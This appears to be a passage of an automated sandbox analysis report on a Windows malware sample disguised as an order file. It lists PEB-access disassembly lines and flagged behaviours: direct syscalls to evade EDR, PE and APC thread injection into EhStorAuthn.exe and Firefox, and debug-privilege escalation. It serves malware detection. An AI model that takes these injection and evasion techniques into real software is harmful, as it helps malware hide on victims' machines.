Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B29F9 mov eax, dword ptr fs:[00000030h] 3_2_018B29F9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C912 mov eax, dword ptr fs:[00000030h] 3_2_0190C912
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE908 mov eax, dword ptr fs:[00000030h] 3_2_018FE908
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE908 mov eax, dword ptr fs:[00000030h] 3_2_018FE908
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878918 mov eax, dword ptr fs:[00000030h] 3_2_01878918
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878918 mov eax, dword ptr fs:[00000030h] 3_2_01878918
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190892A mov eax, dword ptr fs:[00000030h] 3_2_0190892A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0191892B mov eax, dword ptr fs:[00000030h] 3_2_0191892B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954940 mov eax, dword ptr fs:[00000030h] 3_2_01954940
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01900946 mov eax, dword ptr fs:[00000030h] 3_2_01900946
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E mov eax, dword ptr fs:[00000030h] 3_2_018C096E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E mov edx, dword ptr fs:[00000030h] 3_2_018C096E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E mov eax, dword ptr fs:[00000030h] 3_2_018C096E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 mov eax, dword ptr fs:[00000030h] 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 mov eax, dword ptr fs:[00000030h] 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 mov eax, dword ptr fs:[00000030h] 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01924978 mov eax, dword ptr fs:[00000030h] 3_2_01924978
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01924978 mov eax, dword ptr fs:[00000030h] 3_2_01924978
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C97C mov eax, dword ptr fs:[00000030h] 3_2_0190C97C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C89D mov eax, dword ptr fs:[00000030h] 3_2_0190C89D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880887 mov eax, dword ptr fs:[00000030h] 3_2_01880887
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AE8C0 mov eax, dword ptr fs:[00000030h] 3_2_018AE8C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019508C0 mov eax, dword ptr fs:[00000030h] 3_2_019508C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194A8E4 mov eax, dword ptr fs:[00000030h] 3_2_0194A8E4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BC8F9 mov eax, dword ptr fs:[00000030h] 3_2_018BC8F9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BC8F9 mov eax, dword ptr fs:[00000030h] 3_2_018BC8F9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C810 mov eax, dword ptr fs:[00000030h] 3_2_0190C810
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192483A mov eax, dword ptr fs:[00000030h] 3_2_0192483A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192483A mov eax, dword ptr fs:[00000030h] 3_2_0192483A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov ecx, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01892840 mov ecx, dword ptr fs:[00000030h] 3_2_01892840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01884859 mov eax, dword ptr fs:[00000030h] 3_2_01884859
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01884859 mov eax, dword ptr fs:[00000030h] 3_2_01884859
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B0854 mov eax, dword ptr fs:[00000030h] 3_2_018B0854
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916870 mov eax, dword ptr fs:[00000030h] 3_2_01916870
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916870 mov eax, dword ptr fs:[00000030h] 3_2_01916870
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190E872 mov eax, dword ptr fs:[00000030h] 3_2_0190E872
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190E872 mov eax, dword ptr fs:[00000030h] 3_2_0190E872
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934BB0 mov eax, dword ptr fs:[00000030h] 3_2_01934BB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934BB0 mov eax, dword ptr fs:[00000030h] 3_2_01934BB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890BBE mov eax, dword ptr fs:[00000030h] 3_2_01890BBE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890BBE mov eax, dword ptr fs:[00000030h] 3_2_01890BBE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192EBD0 mov eax, dword ptr fs:[00000030h] 3_2_0192EBD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190CBF0 mov eax, dword ptr fs:[00000030h] 3_2_0190CBF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEBFC mov eax, dword ptr fs:[00000030h] 3_2_018AEBFC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954B00 mov eax, dword ptr fs:[00000030h] 3_2_01954B00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEB20 mov eax, dword ptr fs:[00000030h] 3_2_018AEB20
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEB20 mov eax, dword ptr fs:[00000030h] 3_2_018AEB20
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01948B28 mov eax, dword ptr fs:[00000030h] 3_2_01948B28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01948B28 mov eax, dword ptr fs:[00000030h] 3_2_01948B28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192EB50 mov eax, dword ptr fs:[00000030h] 3_2_0192EB50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01928B42 mov eax, dword ptr fs:[00000030h] 3_2_01928B42
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916B40 mov eax, dword ptr fs:[00000030h] 3_2_01916B40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916B40 mov eax, dword ptr fs:[00000030h] 3_2_01916B40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194AB40 mov eax, dword ptr fs:[00000030h] 3_2_0194AB40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878B50 mov eax, dword ptr fs:[00000030h] 3_2_01878B50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934B4B mov eax, dword ptr fs:[00000030h] 3_2_01934B4B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934B4B mov eax, dword ptr fs:[00000030h] 3_2_01934B4B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187CB7E mov eax, dword ptr fs:[00000030h] 3_2_0187CB7E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954A80 mov eax, dword ptr fs:[00000030h] 3_2_01954A80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B8A90 mov edx, dword ptr fs:[00000030h] 3_2_018B8A90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888AA0 mov eax, dword ptr fs:[00000030h] 3_2_01888AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888AA0 mov eax, dword ptr fs:[00000030h] 3_2_01888AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6AA4 mov eax, dword ptr fs:[00000030h] 3_2_018D6AA4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880AD0 mov eax, dword ptr fs:[00000030h] 3_2_01880AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4AD0 mov eax, dword ptr fs:[00000030h] 3_2_018B4AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4AD0 mov eax, dword ptr fs:[00000030h] 3_2_018B4AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BAAEE mov eax, dword ptr fs:[00000030h] 3_2_018BAAEE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BAAEE mov eax, dword ptr fs:[00000030h] 3_2_018BAAEE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190CA11 mov eax, dword ptr fs:[00000030h] 3_2_0190CA11
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEA2E mov eax, dword ptr fs:[00000030h] 3_2_018AEA2E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BCA24 mov eax, dword ptr fs:[00000030h] 3_2_018BCA24
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BCA38 mov eax, dword ptr fs:[00000030h] 3_2_018BCA38
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A4A35 mov eax, dword ptr fs:[00000030h] 3_2_018A4A35
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A4A35 mov eax, dword ptr fs:[00000030h] 3_2_018A4A35
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890A5B mov eax, dword ptr fs:[00000030h] 3_2_01890A5B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890A5B mov eax, dword ptr fs:[00000030h] 3_2_01890A5B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Enables debug privileges
Source: C:\Users\user\Desktop\Order SO311180.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Order SO311180.exe Memory written: C:\Users\user\Desktop\Order SO311180.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread register set: target process: 5876 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread APC queued: target process: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Order SO311180.exe Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe" Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe" Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Users\user\Desktop\Order SO311180.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
